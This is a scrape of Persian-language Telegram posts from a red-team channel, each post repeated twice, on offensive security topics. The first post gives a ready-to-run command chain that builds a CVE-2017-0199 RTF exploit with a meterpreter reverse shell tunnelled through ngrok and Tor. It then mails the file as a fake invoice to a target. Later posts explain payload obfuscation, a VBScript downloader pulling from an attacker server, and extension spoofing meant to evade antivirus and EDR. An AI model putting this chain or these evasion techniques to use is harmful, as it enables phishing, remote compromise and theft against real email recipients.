#RedTeam_CVE_2017-0199
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
apt-get install -y sendemail tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use exploit/windows/fileformat/office_word_hta;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
root@unk9vvn:~# mv /root/.msf4/local/product.rtf /root;sendEmail -f support@megacloud.com -t <Email-TARGET> -u "Invoice Attached" -m "Please Check Product" -a product.rtf -s <SMTP-SERVER> -v
@Unk9vvN#Obfuscation #Shellcode on Exploit
نمونه ای از روش های مبهم سازی پایلود پاورشلی بر بستر یک آسیب پذیری که بر روی زبان جاوا اسکریپت طراحی شده است,
نکته این تصویر این است که درک کردن آسیب پذیری ها و اکسپلویت نویسی برای آنها فقط لازمه یک نفوذ موفق نیست بلکه در خصوص تکنیک های #RedTeam ها هم میبایست یک هکر آگاه باشه تا بتونه Detection ها Logger ها و دیگر مکانیزم های نظارتی رو به اشتباه محاسباتی دچار کنه...
البته مدل های ٍمبهم سازی میتونه بر بستر زبان اسمبلی هم باشه مانند استفاده از الگوریتم های پالیمورفیسم, متامورفیسم , میمیمورفیسم و غیره.....
https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
@Unk9vvN
نمونه ای از روش های مبهم سازی پایلود پاورشلی بر بستر یک آسیب پذیری که بر روی زبان جاوا اسکریپت طراحی شده است,
نکته این تصویر این است که درک کردن آسیب پذیری ها و اکسپلویت نویسی برای آنها فقط لازمه یک نفوذ موفق نیست بلکه در خصوص تکنیک های #RedTeam ها هم میبایست یک هکر آگاه باشه تا بتونه Detection ها Logger ها و دیگر مکانیزم های نظارتی رو به اشتباه محاسباتی دچار کنه...
البته مدل های ٍمبهم سازی میتونه بر بستر زبان اسمبلی هم باشه مانند استفاده از الگوریتم های پالیمورفیسم, متامورفیسم , میمیمورفیسم و غیره.....
https://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sean_taylor-binary_obfuscation.pdf
@Unk9vvN
#Active_Directory PenTesting
در جریان عملیات های #RedTeam میتوان به تست آسیب پذیری های سرویس AD اشاره کرد, اما روش های متعددی در خصوص تست نفوذ برای آن وجود داره, که من در این پست به یکی از مناسب ترین آنها اشاره خواهم کرد,
در جریان Implementation در پروژه های #AD هکر به نامی که نویسنده Tools هایی مانند Mitmf بوده, یک اسکریپت طراحی کرده که با C&C معروف Empire ادغام شده و یک Recon بسیار خوبی رو بصورت اتوماتیک انجام خواهد داد.
https://github.com/byt3bl33d3r/DeathStar
@Unk9vvN
در جریان عملیات های #RedTeam میتوان به تست آسیب پذیری های سرویس AD اشاره کرد, اما روش های متعددی در خصوص تست نفوذ برای آن وجود داره, که من در این پست به یکی از مناسب ترین آنها اشاره خواهم کرد,
در جریان Implementation در پروژه های #AD هکر به نامی که نویسنده Tools هایی مانند Mitmf بوده, یک اسکریپت طراحی کرده که با C&C معروف Empire ادغام شده و یک Recon بسیار خوبی رو بصورت اتوماتیک انجام خواهد داد.
https://github.com/byt3bl33d3r/DeathStar
@Unk9vvN
#VBScript for File Transfer
یکی از چالش های همیشگی هکرهای #RedTeam انجام عملیات Transfer File بر روی سیستم قربانی هستش, حالا یک اسکریپت به زبان VBScript رو میبینیم در VisualCode که البته این اسکریپت , بر روی یک فایل BAT هستش که با اجرا شدن اون یا اجرای دستورات بصورت مستفیم در cmd میتونیم اسکریپت VBS خودمون رو بسیازیم در Directory مربوطه , و بعد از اون با استفاده از مفسر فایل فرمت VBS یعنی cscript دستور دانلود فایل رو از وبسرور هکر بدیم,
این کار در خط فرمان cmd در تصویر انجام شده و فایل با موفقیت Transfer شده, یک نکته بگم اینجا برای دور زدن مکانیزم های Detection نباید فایل فرمت های PE رو Transfer کرد چرا که Detect شدن اونها بسیار درصد بالایی داره اینجا از shellcode هایی میبایست استفاده کرد که بصورت MultiStage میان و پایلود اصلی رو بصورت ENC شده Transfer میکنند,
اما خب تا همین جای کار که ما بتونیم یک Transfer بر بستر زبان های Interpreter مانند VBS داشته باشیم, خودش گزینه خوبی برای فرار از Detection ها هستش, با این روش میشه دسترسی های Shell رو به سطح دسترسی Meterpreter برد.
@Unk9vvN
یکی از چالش های همیشگی هکرهای #RedTeam انجام عملیات Transfer File بر روی سیستم قربانی هستش, حالا یک اسکریپت به زبان VBScript رو میبینیم در VisualCode که البته این اسکریپت , بر روی یک فایل BAT هستش که با اجرا شدن اون یا اجرای دستورات بصورت مستفیم در cmd میتونیم اسکریپت VBS خودمون رو بسیازیم در Directory مربوطه , و بعد از اون با استفاده از مفسر فایل فرمت VBS یعنی cscript دستور دانلود فایل رو از وبسرور هکر بدیم,
این کار در خط فرمان cmd در تصویر انجام شده و فایل با موفقیت Transfer شده, یک نکته بگم اینجا برای دور زدن مکانیزم های Detection نباید فایل فرمت های PE رو Transfer کرد چرا که Detect شدن اونها بسیار درصد بالایی داره اینجا از shellcode هایی میبایست استفاده کرد که بصورت MultiStage میان و پایلود اصلی رو بصورت ENC شده Transfer میکنند,
اما خب تا همین جای کار که ما بتونیم یک Transfer بر بستر زبان های Interpreter مانند VBS داشته باشیم, خودش گزینه خوبی برای فرار از Detection ها هستش, با این روش میشه دسترسی های Shell رو به سطح دسترسی Meterpreter برد.
@Unk9vvN
#RedTeam Tools
علوم سایبری همواره در حال گذار از مباحث روز بوده و مطالب جدیدتر و مباحث و استانداردهای جدیدتری رو سازمان دهی میکند, یکی از این استانداردها تسلط بر تکنیک های دوازده گانه شرکت MITRE ATT&CK هستش که به تازگی سازماندهی شده,
ما در این سطح از فضای تکنیکال و عملیات های PenetrationTesting خلاء هایی در کشور داریم که البته جز تیم های وصل به ارگان های نظامی مانند OilRig دیگر تیم های مردم نهاد و دانشجویی نگرش چندانی در این فضا نداشتند,
از این رو پیشنهاد میکنم که سابقه یک تیم ایرانی منتسب به سازمان های نظامی ایران رو بررسی کنید تا از کم و کیف تکنیک های استفاده شده و همینطور Tools های بکار رفته شده در حملات APTs مطلع شوید و کمی در امر حملات RealWorld نگاه دقیقتری داشته باشید,
تصویر پست یکی از همین Tools هایی است که توسط تیم OilRig و پنتسترهای RedTeam استفاده میشه.
https://attack.mitre.org/groups/G0049/
@Unk9vvN
علوم سایبری همواره در حال گذار از مباحث روز بوده و مطالب جدیدتر و مباحث و استانداردهای جدیدتری رو سازمان دهی میکند, یکی از این استانداردها تسلط بر تکنیک های دوازده گانه شرکت MITRE ATT&CK هستش که به تازگی سازماندهی شده,
ما در این سطح از فضای تکنیکال و عملیات های PenetrationTesting خلاء هایی در کشور داریم که البته جز تیم های وصل به ارگان های نظامی مانند OilRig دیگر تیم های مردم نهاد و دانشجویی نگرش چندانی در این فضا نداشتند,
از این رو پیشنهاد میکنم که سابقه یک تیم ایرانی منتسب به سازمان های نظامی ایران رو بررسی کنید تا از کم و کیف تکنیک های استفاده شده و همینطور Tools های بکار رفته شده در حملات APTs مطلع شوید و کمی در امر حملات RealWorld نگاه دقیقتری داشته باشید,
تصویر پست یکی از همین Tools هایی است که توسط تیم OilRig و پنتسترهای RedTeam استفاده میشه.
https://attack.mitre.org/groups/G0049/
@Unk9vvN
#RedTeam #Assessments
در خصوص تیم قرمز بارها بصورت نکته ای صحبت کردیم اما در این پست کمی دقیقتر به ماهیت تخصصی این تیم میپردازیم, تیم قرمز از یک لایف استایل اشتراکی بهره میبره که در تمامی شرکت ها یک تعریف کلی داره, که آنهارا ذکر میکنم,
#0x1 Recon
#0x2 Inital Compromise
#0x3 Establish Persistence
#0x4 Escalate Privileges
#0x5 Internal Recon
#0x6 Lateral Movement
#0x7 Data Analysis
#0x8 Exfiltrate and Complete Mission
در خصوص تمامی این مراحل میتوان ساعت ها صحبت کرد اما نکته ای که بسیار مهم است ذکر شود این است که تیم های قرمز دقیقا به سبک تیم های #APTs عمل میکنند و تمام تلاش تیم قرمز بر آن است که تمامی پروسه ۰ تا ۱۰۰ نفوذ را با استفاده از روش های نوین خود پیاده سازی کند, میتوانید عملکرد تیم های #APTs رو با استایل تیم قرمز مقایسه کنید.
https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI/raw/master/examples/ATTACK_Attribution.xlsx
https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI/raw/master/examples/ATTACK_ALL.xlsx
@Unk9vvN
در خصوص تیم قرمز بارها بصورت نکته ای صحبت کردیم اما در این پست کمی دقیقتر به ماهیت تخصصی این تیم میپردازیم, تیم قرمز از یک لایف استایل اشتراکی بهره میبره که در تمامی شرکت ها یک تعریف کلی داره, که آنهارا ذکر میکنم,
#0x1 Recon
#0x2 Inital Compromise
#0x3 Establish Persistence
#0x4 Escalate Privileges
#0x5 Internal Recon
#0x6 Lateral Movement
#0x7 Data Analysis
#0x8 Exfiltrate and Complete Mission
در خصوص تمامی این مراحل میتوان ساعت ها صحبت کرد اما نکته ای که بسیار مهم است ذکر شود این است که تیم های قرمز دقیقا به سبک تیم های #APTs عمل میکنند و تمام تلاش تیم قرمز بر آن است که تمامی پروسه ۰ تا ۱۰۰ نفوذ را با استفاده از روش های نوین خود پیاده سازی کند, میتوانید عملکرد تیم های #APTs رو با استایل تیم قرمز مقایسه کنید.
https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI/raw/master/examples/ATTACK_Attribution.xlsx
https://github.com/Cyb3rWard0g/Invoke-ATTACKAPI/raw/master/examples/ATTACK_ALL.xlsx
@Unk9vvN
#Defensive #Matrix
شاید تا به حال در خصوص Matrix تکنیکال مربوط به #RedTeam و #PurpleTeam رو دیده باشید اما Matrix تیم های #BlueTeam و مکانیزم ها و محصولات آنها چطور؟ در تصویر پست تمامی مکانیزم های شناسایی کننده و دفاعی رو در موقعیت مربوط به خود میبینید,
تیم های قرمز ماهیت کار کرد خود را در ایجاد روشهای جدید برای دور زدن این مکانیزم ها میبینند, و همواره نیازهای جدید تیم های آبی به حالا هم محصولات و سیاست های تدافعی تایین میکنند, چرخه ای که هر دو مکمل هم هستند و هر دو از فضاهای تکنیکالی یکدیگر اشراف کامل دارند, فقط ماهیت فعالیت آنها یک در دور زدن یکی در رهگیری کردن به واسطه هوش مصنوعی تعریف میشود,
نگاه غلطی که همواره در ایران دیده میشود این است که کسانی که بصورت #BlueTeam فعالیت دارند صرفاء میبایست با محصولات Analyser و تحلیل ترافیک و غیره سروکار داشته باشند, این در حالیست که بسیاری از این محصولات و محققین تولید کننده آنها در بالاترین سطوح تکنیکالی تیم قرمز قرار دارند و به همین واسطه تولید محصول کرده و به کشورهایی مانند ایران میفروشند, محصولات #MDR از این دست موارد هستند..
MDR
@Unk9vvN
شاید تا به حال در خصوص Matrix تکنیکال مربوط به #RedTeam و #PurpleTeam رو دیده باشید اما Matrix تیم های #BlueTeam و مکانیزم ها و محصولات آنها چطور؟ در تصویر پست تمامی مکانیزم های شناسایی کننده و دفاعی رو در موقعیت مربوط به خود میبینید,
تیم های قرمز ماهیت کار کرد خود را در ایجاد روشهای جدید برای دور زدن این مکانیزم ها میبینند, و همواره نیازهای جدید تیم های آبی به حالا هم محصولات و سیاست های تدافعی تایین میکنند, چرخه ای که هر دو مکمل هم هستند و هر دو از فضاهای تکنیکالی یکدیگر اشراف کامل دارند, فقط ماهیت فعالیت آنها یک در دور زدن یکی در رهگیری کردن به واسطه هوش مصنوعی تعریف میشود,
نگاه غلطی که همواره در ایران دیده میشود این است که کسانی که بصورت #BlueTeam فعالیت دارند صرفاء میبایست با محصولات Analyser و تحلیل ترافیک و غیره سروکار داشته باشند, این در حالیست که بسیاری از این محصولات و محققین تولید کننده آنها در بالاترین سطوح تکنیکالی تیم قرمز قرار دارند و به همین واسطه تولید محصول کرده و به کشورهایی مانند ایران میفروشند, محصولات #MDR از این دست موارد هستند..
MDR
@Unk9vvN
#Obfuscation (#RAR with #JPG ext) #RedTeam
یکی از روش هایی که همواره در عملیات های تیم قرمز در سالهای آتی مورد توجه بود تکنیک استفاده از Extension Spoofing بواسطه کاراکتر Letf-to-Right و همچنین استفاده از فایل فرمت SFX که مبتنی بر نرم افزار WinRAR به نوعی عملیات Section Compression رو در فایل فرمت خودش انجام میداد و به روش Stub Decompression مقادیر کمپر شده خودش رو آزاد میکرد، و در کنار این آزاد کردن مواردی رو هم خودش اجرا میکرد مانند: run as administrator یا Extract کردن داده های کمپرس شده در آدرس مشخص شده و همچنین اجرای اون فایل ها...
اما در سال 2018 که تیم تحقیقاتی Unk9vvN دمویی از این تکنیک رو نمایی کرد، همزمان با این رو نمایی یک APT 39 منتسب به ایران هم رخ داد که از همین تکنیک فوق استفاده شده بود، همچنین این تکنیک همونطور که در تصویر دوم مشاهده میشه آن زمان پتانسیل دور زدن EDR و NIDS و AV ها رو داشته و کاملا عملیاتی بوده، البته امروز دیگر این تکنیک لو رفته و کار آمد نیست، برای مشاهده بخشی از این تکنیک میتونید به دمو تولید شده در سال 2019 مراجعه نمایید...
@Unk9vvN
یکی از روش هایی که همواره در عملیات های تیم قرمز در سالهای آتی مورد توجه بود تکنیک استفاده از Extension Spoofing بواسطه کاراکتر Letf-to-Right و همچنین استفاده از فایل فرمت SFX که مبتنی بر نرم افزار WinRAR به نوعی عملیات Section Compression رو در فایل فرمت خودش انجام میداد و به روش Stub Decompression مقادیر کمپر شده خودش رو آزاد میکرد، و در کنار این آزاد کردن مواردی رو هم خودش اجرا میکرد مانند: run as administrator یا Extract کردن داده های کمپرس شده در آدرس مشخص شده و همچنین اجرای اون فایل ها...
اما در سال 2018 که تیم تحقیقاتی Unk9vvN دمویی از این تکنیک رو نمایی کرد، همزمان با این رو نمایی یک APT 39 منتسب به ایران هم رخ داد که از همین تکنیک فوق استفاده شده بود، همچنین این تکنیک همونطور که در تصویر دوم مشاهده میشه آن زمان پتانسیل دور زدن EDR و NIDS و AV ها رو داشته و کاملا عملیاتی بوده، البته امروز دیگر این تکنیک لو رفته و کار آمد نیست، برای مشاهده بخشی از این تکنیک میتونید به دمو تولید شده در سال 2019 مراجعه نمایید...
@Unk9vvN
Media is too big
VIEW IN TELEGRAM
#Cybereason #RedTeam VS #BlueTeam
دموی معرفی خدمات شرکت Cybereason تولید کننده سامانه های XDR و غیره است که در نوع خودش جالب بود، ولی خب شما بهترین سامانه های دنیا رو هم داشته باشید باز امکان دور زدن تمامی مکانیزم های شما بواسطه طراحی بدافزارهای پیشرفته با تکنیک های نو آورانه خواهد بود.
لذا بهترین سیاست در خصوص برنده بودن در بازی موش و گربه تیم های امنیت دفاعی و تهاجمی، وجود مراکز به معنی واقعی کلمه تحقیقاتی با ظرفیت ملی است که میتواند جامعیت علمی و اطلاعاتی را در بر داشته باشد.
متاسفانه حاکمیت همچنان در حلقه فساد برخی آقایان مسئول گیر افتاده و این لایه مدیریتی اجازه شنیده شدن نظرات کارشناسان در میدان، به رده های بالاتر را نمیدهند.
از طرفی شرکت های دلال که همواره با محصولات نا کار آمد خارجی بازار را تسخیر کرده اند نیز مجال سرمایه گذاری بر روی فعالیت های تحقیق و توسعه نداده و خود یکی از عاملین اصلی مهاجرت محققین این حوزه هستند.
امنیت سایبری بسیار وابسته به تحقیق و توسعه است، لذا کار آمدی در آن منوط بر توانمندی علمی داخلی است، البته این به معنی تولید محصولات بی کیفیت یا ظاهری به هیچ وجه نیست.
@Unk9vvN
دموی معرفی خدمات شرکت Cybereason تولید کننده سامانه های XDR و غیره است که در نوع خودش جالب بود، ولی خب شما بهترین سامانه های دنیا رو هم داشته باشید باز امکان دور زدن تمامی مکانیزم های شما بواسطه طراحی بدافزارهای پیشرفته با تکنیک های نو آورانه خواهد بود.
لذا بهترین سیاست در خصوص برنده بودن در بازی موش و گربه تیم های امنیت دفاعی و تهاجمی، وجود مراکز به معنی واقعی کلمه تحقیقاتی با ظرفیت ملی است که میتواند جامعیت علمی و اطلاعاتی را در بر داشته باشد.
متاسفانه حاکمیت همچنان در حلقه فساد برخی آقایان مسئول گیر افتاده و این لایه مدیریتی اجازه شنیده شدن نظرات کارشناسان در میدان، به رده های بالاتر را نمیدهند.
از طرفی شرکت های دلال که همواره با محصولات نا کار آمد خارجی بازار را تسخیر کرده اند نیز مجال سرمایه گذاری بر روی فعالیت های تحقیق و توسعه نداده و خود یکی از عاملین اصلی مهاجرت محققین این حوزه هستند.
امنیت سایبری بسیار وابسته به تحقیق و توسعه است، لذا کار آمدی در آن منوط بر توانمندی علمی داخلی است، البته این به معنی تولید محصولات بی کیفیت یا ظاهری به هیچ وجه نیست.
@Unk9vvN